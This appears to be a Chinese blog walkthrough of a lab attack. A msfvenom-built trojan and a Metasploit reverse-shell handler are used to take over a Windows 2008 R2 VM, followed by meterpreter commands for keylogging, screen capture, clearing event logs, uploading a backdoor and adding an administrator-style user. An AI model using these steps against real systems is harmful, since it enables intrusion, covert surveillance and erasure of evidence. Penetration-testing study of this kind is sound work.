msf rhosts设置文件_MSF入侵Windows之实战

原理:

  利用msf模块中的msfvenom模块,生成123.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

准备:

  靶机:windows 2008 r2  

  ip:192.168.100.20

  攻击主机:kali         

  ip:192.168.100.21

实战:

1、     查看攻击主机ip

84e5f0df90c7ea3b2c27c1bc48c65699.png

2、     生成123.exe木马文件

f1a447ac2aa2fc5dc8f9adc44002c9c5.png

3、     将制作好的木马文件放到目标机内

22cd65ec2374298d3e8d602c5032f4d5.png

4、     启动msfconsole进入msf

9c7d9ea17360e6ac57184d641568c9d3.png

5、     加载exploit/multi/handler,设置payload反弹,设置LHOS反弹地址

9a0d2c2f3bde7d7730ac7fc6bb5499cb.png

6、     show options查看所设置的内容

10d1c24f12babae202141b0276f2d74c.png

7、     设置好后,直接exploit,开始攻击,等待目标靶机中招

8fed04b2a782e3da26c6facdf6c5c4d2.png

8、     当靶机中招后,获得反弹shell,渗透成功

1b1029f288843b70e273aa171452a4eb.png

9、     此时我们就可以对靶机进行操作了

936b40039c55a16086461d5b927b65a5.png

10、     如果出现了乱码现象,这是编码的问题,在终端->修改编码->改成中文的GBK退出再次shell即可解决

ce28eb040e72e682fb5683abcfeb2bf1.png

11、     meterpreter下的部分命令总结:

getwd当前目录

0f3f2df4647df3bce1bd89da63a733ff.png

dir查看所有文件

0b488acee5e2417becbdfb8c1b709336.png

cat111.txt 查看文件111.txt内容

97c2d5bad4923b6d98109fbc35296434.png

search-f cmd.exe (搜索名为123.exe文件所在目录)

1d9c2ba3e94419f7b62cfc0247ad493a.png

upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件

d1d19caabcdfca86ab06c46c30b26799.png

downloadc:\123txt /root 下载文件

a2cad9424ffb574c67a569ab3f0a67a6.png

e16152eb0b337ac4423905929236fb68.png

clearev清除日志

f0a419a08112bf5e9e8eee7a1cfcb00d.png

getuid当前用户

609117e4ad22c37d70c04eca8b114c6d.png

ps 查看所用进程

0d8813d6a142d1b8e7c854b8f8a00831.png

sysinfo系统信息

a3a44a364d3e254eb47bbcdba58b139b.png

keyscan_start开始键盘记录

keyscan_stop停止键盘记录

keyscan_dump查看结果

f4702d3c37fefb6f7f984fb7c7f09943.png

屏幕截图

screenshot

2f666e1a2221c1d63c54ca17e1116039.png

49e46bae6e30b9865518a74e1a4c51e9.png

屏幕监控

runvnc

316c4f92347deae00ca58194227fb4e1.png

6d945716ff0c687093808203fd0631a0.png

shell

获取shell,进入cmd

26f7314b26109bb9d88a8c3f4c07a7c9.png

netuser 用户名 密码 /add 添加用户(jeff/Abc!23)

644d9e0fcef8a22a2a7ee5a6be2e3282.png

netuser 用户名 密码 更改用户密码(jeff/ABc!@3)

15b88f52ee432542c26dd80c18ce9f12.png

最后,本次实验仅是仅供实验,切勿用于实战,否则后果自负!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值